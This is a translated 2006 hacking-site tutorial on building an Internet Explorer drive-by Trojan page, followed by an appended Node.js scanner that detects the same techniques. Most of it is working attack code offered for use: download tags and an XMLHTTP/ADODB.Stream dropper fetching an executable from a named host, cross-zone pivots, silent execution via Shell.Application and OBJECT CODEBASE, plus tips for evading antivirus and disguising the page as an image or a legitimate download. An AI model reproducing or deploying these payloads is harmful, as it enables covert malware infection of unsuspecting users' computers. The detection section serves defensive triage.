myhack58 (anonymous) MYHACK58:62200611693
Sep 14, 2006 - 12:00 a.m.

You too can be a hacker: building the "perfect" IE web page Trojan (vulnerability warning, Black Bar Safety Net)

Anonymous, www.myhack58.com

If we want to build the perfect IE web page Trojan, we first have to agree on what "perfect" means. In my view a perfect IE web page Trojan should have at least the following four properties:

One: it evades antivirus detection and removal;

Two: it does not trigger personal (network) firewall alerts;

Three: it works on most Windows versions (mainly Windows 98, Windows Me, Windows 2000, Windows XP and Windows 2003) and on most IE versions (mainly IE 5.0, IE 5.5 and IE 6.0), ideally regardless of which service pack is installed;

Four: the viewer does not easily notice any change in IE, so it goes unnoticed and can stay undiscovered for a long time.

(Note that the four points above refer only to the web page itself, not to your Trojan program: the web page is responsible for running the Trojan you specify. Whether your Trojan itself is any good is up to you; don't come looking for me, I won't write one!)

Meeting these four points is what keeps your horse young for longer and running faster...

Has reading the above got your heart racing? Don't rush; first let's review the shortcomings of the existing IE web page Trojans!

First: IE web page Trojans using the old MIME vulnerability

This Trojan is still popular, but the vulnerability is old, few IE versions are still affected, and because its impact was so large at the time almost everyone has installed the patch, so the planting success rate is now fairly low.

Second: IE web page Trojans using the com.ms.activeX.ActiveXComponent vulnerability combined with the WSH and FSO controls

The com.ms.activeX.ActiveXComponent vulnerability is present in most IE versions and is one of the better bugs, with very high practical value. However, it relies on the WSH (Windows Script Host) and FSO (Scripting.FileSystemObject) controls, which antivirus products treat as virus tools, so although it avoids firewall alerts it cannot escape antivirus detection, for example by Norton.

Third: IE web page Trojans using the OBJECT type-validation (Object Data Remote) vulnerability, combined with the WSH and FSO controls; the typical representative is the "Moving Shark" web Trojan generator

The biggest advantage of this kind of Trojan is that it works on more IE versions and the vulnerability is relatively new, but it has the following disadvantages:

1. Because this vulnerability has to launch a separate executable that accesses the network to download the Trojan, it triggers personal-firewall alerts, for example from the Skynet (天网) firewall;

2. If this IE web page Trojan uses the WSH and FSO controls, it likewise cannot escape antivirus detection such as Norton's, and the Moving Shark web Trojan uses exactly those controls. Sigh...

3. This vulnerability also requires the web server to support dynamic pages (ASP, JSP, CGI, etc.), which limits its use, since free and stable dynamic hosting is rare nowadays. The vulnerability can also be exploited through a MIME-encoded mail form, but testing showed that does not work on IE 6.0.

Seeing the analysis above, do you share the feeling that "a thousand soldiers are easy to find, but a good general is hard to get; horses are plentiful, but a thousand-li horse is hard to find"? Don't worry, let me bring all of this together and build the IE web page Trojan I have in mind.

First, to evade antivirus detection we cannot use the WSH and FSO controls, because any use of WSH or FSO is bound to be caught by Norton. So what can we use instead? After much effort (the inspiration actually came while I was studying ASP Trojans) I finally found a usable control: Shell.Application. It is marked safe for scripting, so in a web page running in the "My Computer" zone it executes unimpeded, and it is easier to get execute permission for than WSH and FSO: a cross-domain (cross-zone) vulnerability is all that is needed. Consider the following JavaScript:

<SCRIPT LANGUAGE="javascript" type="text/javascript">
var shell=new ActiveXObject("Shell.Application");
// open the Windows folder through the shell namespace and invoke the default verb ("open") on Notepad.exe
shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb();
</SCRIPT>

Save it as test.htm and open it: Notepad starts automatically, and without the "allow this to run?" prompt that WSH and FSO produce. Interesting, isn't it? We can now run any program whose path is known, but we need to run our own Trojan, so we still have to get the Trojan onto the viewer's computer and find out where it landed. Let's solve these one at a time:

1. Download the Trojan program to the viewer's computer.

There are many ways to do this, such as the Windows help-file protocol (its:) arbitrary file download vulnerability I described earlier, but we will not use that this time. Instead, here are two better download methods:

Example A: use a SCRIPT tag, as follows:

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>

Note that the LANGUAGE attribute can be any string other than javascript, VBScript or JScript (IE still fetches the src file, but does not try to run it as script); the src attribute is of course the address of your Trojan program. Because most free hosting forbids uploading .exe files for security reasons, we can work around it by renaming the extension to bat, pif, scr or com; the file runs just the same.

Example B: use a LINK tag, as follows:

<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>

Place this code between <HEAD></HEAD>; the href attribute value is the address of the Trojan program.

These two are, to my knowledge, the best methods for downloading the Trojan program; in both cases the downloaded file is saved in a subdirectory of the IE cache, Temporary Internet Files.

2. Find the path of the Trojan downloaded to the viewer's computer

We can use some properties and methods of the Shell.Application control, combined with JavaScript try{}catch(e){}finally{} error handling and a recursive search, to locate the Trojan program. The code is as follows:

function icyfoxlovelace(){
// Derive the Windows system directory and the system drive from the page's own URL
// (the page is loaded from a res:// URL that points into the system directory)
var url=document.location.href;
var xtmu=url.substring(6,url.indexOf('\\',9)+1); // e.g. C:\WINDOWS\
var xtp=url.substr(6,3);                          // e.g. C:\

var shell=new ActiveXObject("Shell.Application");
var runbz=1; // 1 = not run yet; set to 0 once the Trojan has been launched

// Set the Trojan's size in bytes here
// Replace 198201 with the actual size of your Trojan program
var exeSize=198201;

// Set the Trojan's name and extension (exe, com, bat, pif, scr); used to confirm the download.
// The IE cache renames the file to name[n].ext, hence the \[\d*\] in the pattern.
// Replace icyfox below with your Trojan's name and bat with its extension
var a=/icyfox\[\d*\]\.bat/i;

var b=/[A-Za-z]:\\/i; // regular expression for recognising a drive root such as C:\

// Search (and run) the Trojan: the cache first, then the user profiles, then every drive
wjj(xtmu+"Temporary Internet Files\\"); // the cache files sit below Content.IE5\
if(runbz)wjj(xtp+"Documents and Settings\\");
if(runbz)yp();

// Search every hard disk partition for the Trojan program and run it
function yp(){
try{
// the ParentFolder of a drive root is "My Computer", whose items are the drives
var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());
for(;!c.atEnd();c.moveNext()){
if(runbz){if(b.test(c.item().path))wjj(c.item().path);}
else break;
}
}catch(e){}
}

// Recursively search the given directory (including subdirectories) for the Trojan program and run it
function wjj(dir){
try{
var c=new Enumerator(shell.namespace(dir).Items());
for(;!c.atEnd();c.moveNext()){
if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){
var f=c.item().path;
var v=f.lastIndexOf('\\')+1;
try{
shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb(); // run the Trojan program
runbz=0;
break;
}catch(e){}
}
if(!c.item().Size)wjj(c.item().path+"\\"); // a Size of 0 means a subdirectory: recurse into it
}
}catch(e){}
}

}

icyfoxlovelace();

Save the above code as icyfox.js.

Next we use a small cross-domain (cross-zone) execution vulnerability to obtain the privileges of a page in the "My Computer" zone. Did you, like me, think this kind of bug was only good for cross-site scripting and stealing cookies? Now it finally gets to show its face. The code is as follows:

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE>icyfoxlovelace network lab: the perfect IE web page Trojan</TITLE>
</HEAD>
<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
<SCRIPT LANGUAGE="javascript">
// Set the network address of the icyfox.js file from above here
// Replace http://www.godog.y365.com/wodemuma/icyfox.js with the address your icyfox.js is actually served from
var jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,'//'); // double each '/' before the URL is embedded in the file:javascript: URL below
var WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/* IE 5.0: use an iframe whose src is set to icyfox://. This gives the frame the privileges of the "My Computer" zone,
   because icyfox:// is a non-existent protocol, so IE uses the res:// protocol to open the syntax error page
   syntax.htm from SHDOCLC.DLL; SHDOCLC.DLL lives in the system directory, which is what icyfox.js relies on
   to derive the Windows system directory and the system drive. */
document.write("<iframe style='display:none;' name='icyfoxlovelace' src='icyfox://'></iframe>");
setTimeout("muma0()",1000);
}
else{
/* IE 5.5 and IE 6.0: use the _search vulnerability instead. The address opened is set to icyfox://, so the
   _search pane gets the privileges of the "My Computer" zone. The iframe trick above cannot be used on IE 6.0;
   it should work on IE 5.5, but I did not test it. The downside is that a search bar is opened, a small pity. */
window.open("icyfox://","_search");
setTimeout("muma1()",1000);
}

// Use the file:javascript: protocol vulnerability to inject icyfox.js into the "icyfox://" window that already
// holds "My Computer" zone privileges, and run it
function muma0(){
window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","icyfoxlovelace");
}

function muma1(){
window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","_search");
}
</SCRIPT>
</BODY>
<NOSCRIPT><iframe style="display:none;" src='.'></iframe></NOSCRIPT>
</HTML>

Save the above code as icyfox.htm. If you like, you can change the extension to jpg and add a nice background picture to make an image Trojan, or even change it to exe to pose as the download link of a legitimate program; adding a <meta http-equiv="refresh" content="5;url='http://www.godog.y365.com/winrar.exe'"> tag inside <HEAD></HEAD> redirects to the real program's download address after a delay, which makes the deception more convincing.

Does the above make you want to rush off and try it? Wait a moment: if you think Windows 98 is not worth supporting, there is an even better Trojan waiting for you. Have you noticed that Windows 2000 and Windows XP install the ADODB.Stream and Microsoft.XMLHTTP controls by default? Like Shell.Application, both are marked safe for scripting and run unimpeded in a page in the "My Computer" zone. Consider the following code:

function icyfox(){
// Set the name the Trojan is saved under in the system directory; the one I chose looks a lot like Explorer.exe, doesn't it?
var name="Explroer.exe";
// Set the download address of your Trojan program here (the extension can be changed to anything, or even dropped,
// which may get around the upload restrictions of free hosting better)
var url="http://www.godog.y365.com/wodemuma/icyfox.bat";
try{
// Derive the Windows system directory from the page's own URL (as in icyfox.js above) and append the file name
var folder=document.location.href;
folder=folder.substring(6,folder.indexOf('\\',9)+1)+name;
// Fetch the Trojan bytes synchronously
var xml=new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET",url,false);
xml.send();
if(xml.status==200){
// Write the binary response to disk with ADODB.Stream (Type 1 = binary; SaveToFile mode 2 = overwrite)
var ado=new ActiveXObject("ADODB.Stream");
ado.Type=1;
ado.Open();
ado.write(xml.responseBody);
ado.SaveToFile(folder,2);
ado.Close();
ado=null;
}
xml=null;
// Run the saved file by pointing the CODEBASE of an OBJECT tag at it
document.body.insertAdjacentHTML('AfterBegin','<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="'+folder+'"></OBJECT>');
}
catch(e){}

}

icyfox();

Save the above code as icyfox.js, replacing the icyfox.js saved earlier, and inject it into the "My Computer" zone with the same icyfox.htm as above. Enjoy!

Finally, use a little DIY skill to merge the two pieces of code into one; I believe the most perfect IE web page Trojan of this period will then be born in your hands. Isn't that something?

Hint: the code is as follows:
try{new ActiveXObject("ADODB.Stream");icyfox();}catch(e){icyfoxlovelace();}
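From the defender's side, every stage described in this article leaves a static fingerprint in the page text: the SCRIPT/LINK tags that pull an executable into the cache, the ADODB.Stream + XMLHTTP save, the icyfox:// frame, _search target and file:javascript: URL used to reach the "My Computer" zone, and the Shell.Application InvokeVerb or OBJECT CODEBASE call that runs the dropped file. The following Node.js scanner is an added example and not code from the article or its author: it runs a small rule set over page text and reports which stages are present. The rule names, the three sample pages and all host names (*.invalid) are constructed for the example. Note that every control and zone pivot used here was later blocked (ADODB.Stream received a kill bit in 2004, and Windows XP SP2 introduced Local Machine Zone Lockdown), so this is for triaging archived pages and samples, not a measure of current exposure.

```javascript
"use strict";

// Added example, not code from the original article: a static scanner for the
// markers the dropper pages above rely on (cache download via SCRIPT/LINK,
// ADODB.Stream + XMLHTTP save, the My Computer zone pivots, Shell.Application
// InvokeVerb and OBJECT CODEBASE execution). Rule names, sample pages and all
// host names (*.invalid) are constructed for this example.

const EXE_EXT = "(?:exe|bat|pif|scr|com)";

// Each rule: a regex over the raw page text, the attack stage it belongs to,
// and the one-line reason a reviewer would want in the report.
const RULES = [
  { name: "cache-download-script-src", stage: "download",
    re: new RegExp("<script\\b[^>]*\\bsrc\\s*=\\s*[\"']?[^\"'\\s>]+\\." + EXE_EXT + "\\b", "i"),
    why: "<SCRIPT src> fetching an executable into Temporary Internet Files" },
  { name: "cache-download-link-href", stage: "download",
    re: new RegExp("<link\\b[^>]*\\bhref\\s*=\\s*[\"']?[^\"'\\s>]+\\." + EXE_EXT + "\\b", "i"),
    why: "<LINK href> fetching an executable into Temporary Internet Files" },
  { name: "xmlhttp-adodb-save", stage: "download",
    re: /ActiveXObject\s*\(\s*["']adodb\.stream["']\s*\)[\s\S]*?\.SaveToFile\s*\(/i,
    why: "ADODB.Stream.SaveToFile writing fetched bytes to disk" },
  { name: "local-zone-pivot", stage: "pivot",
    // a file:javascript: URL, a _search target, or a frame/window on a made-up scheme
    re: /window\.open\s*\(\s*["']file:javascript:|["']_search["']|src\s*=\s*["']?(?!(?:https?|ftp|file|res):)[a-z]+:\/\//i,
    why: "file:javascript:, _search or bogus-scheme frame used to reach the My Computer zone" },
  { name: "shell-application-invokeverb", stage: "execute",
    re: /ActiveXObject\s*\(\s*["']shell\.application["']\s*\)[\s\S]*?\.invokeverb\s*\(/i,
    why: "Shell.Application ... InvokeVerb() launching a local file without a prompt" },
  { name: "object-codebase-local", stage: "execute",
    // the OBJECT may be spliced in from a JS string, so quotes can be escaped and
    // the path may be concatenated ("'+folder+'") rather than a literal drive path
    re: /<object\b[^>]*\bcodebase\s*=\s*\\?["']?(?:[a-z]:\\|'\s*\+)/i,
    why: "<OBJECT CODEBASE> pointing at a local path to run the dropped file" },
];

// Return the matching rules in rule order. The regexes carry no /g flag, so
// test() is stateless and a scan is repeatable.
function scanPage(text) {
  return RULES.filter((r) => r.re.test(text))
              .map((r) => ({ name: r.name, stage: r.stage, why: r.why }));
}

// A page is a "dropper" when it both brings a file onto disk and contains a way
// to run it, or to pivot into the zone where it can be run.
function classify(text) {
  const stages = new Set(scanPage(text).map((h) => h.stage));
  if (stages.has("download") && (stages.has("execute") || stages.has("pivot"))) return "dropper";
  return stages.size > 0 ? "suspicious" : "clean";
}

// Constructed sample 1: a loader page shaped like the article's icyfox.htm.
const SAMPLE_LOADER = [
  '<HTML><BODY>',
  '<SCRIPT LANGUAGE="whatever" src="http://host.invalid/m/payload.bat"></SCRIPT>',
  '<SCRIPT LANGUAGE="javascript">',
  "document.write(\"<iframe style='display:none;' name='f' src='bogus://'></iframe>\");",
  'function go(){window.open("file:javascript:document.all.tags(\'SCRIPT\')[0].src=\'http://host.invalid/m/p.js\';eval();","f");}',
  'setTimeout("go()",1000);',
  '</SCRIPT></BODY></HTML>',
].join("\n");

// Constructed sample 2: a payload script shaped like the article's second icyfox.js.
const SAMPLE_PAYLOAD = [
  'var xml=new ActiveXObject("Microsoft.XMLHTTP");',
  'xml.open("GET","http://host.invalid/m/payload.bat",false);xml.send();',
  'var ado=new ActiveXObject("ADODB.Stream");ado.Type=1;ado.Open();',
  'ado.write(xml.responseBody);ado.SaveToFile("C:\\\\WINDOWS\\\\Explroer.exe",2);ado.Close();',
  'document.body.insertAdjacentHTML("AfterBegin","<OBJECT style=\\"display:none;\\" TYPE=\\"application/x-oleobject\\" CODEBASE=\\"C:\\\\WINDOWS\\\\Explroer.exe\\"></OBJECT>");',
].join("\n");

// Constructed sample 3: an ordinary page with an external script, stylesheet, frame and popup.
const SAMPLE_BENIGN = [
  '<html><head><link rel="stylesheet" href="/static/site.css">',
  '<script src="https://cdn.invalid/app.js"></script></head>',
  '<body><iframe src="https://video.invalid/embed/1"></iframe>',
  '<script>window.open("https://example.invalid/help","_blank");</script></body></html>',
].join("\n");

for (const [label, page] of [["loader", SAMPLE_LOADER], ["payload", SAMPLE_PAYLOAD], ["benign", SAMPLE_BENIGN]]) {
  console.log(label + ": " + classify(page));
  for (const hit of scanPage(page)) console.log("  " + hit.name + " - " + hit.why);
}
```

The rules are deliberately split by stage: a page that only fetches a .bat into the cache is merely "suspicious" (plenty of broken sites do that by accident), while the combination of a download stage with an execution or zone-pivot stage is what distinguishes the two-part construction this article describes. Run it over archived HTML and JS with `node` to get a stage-by-stage report.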

Note: no one may use the content described in this article for illegal purposes.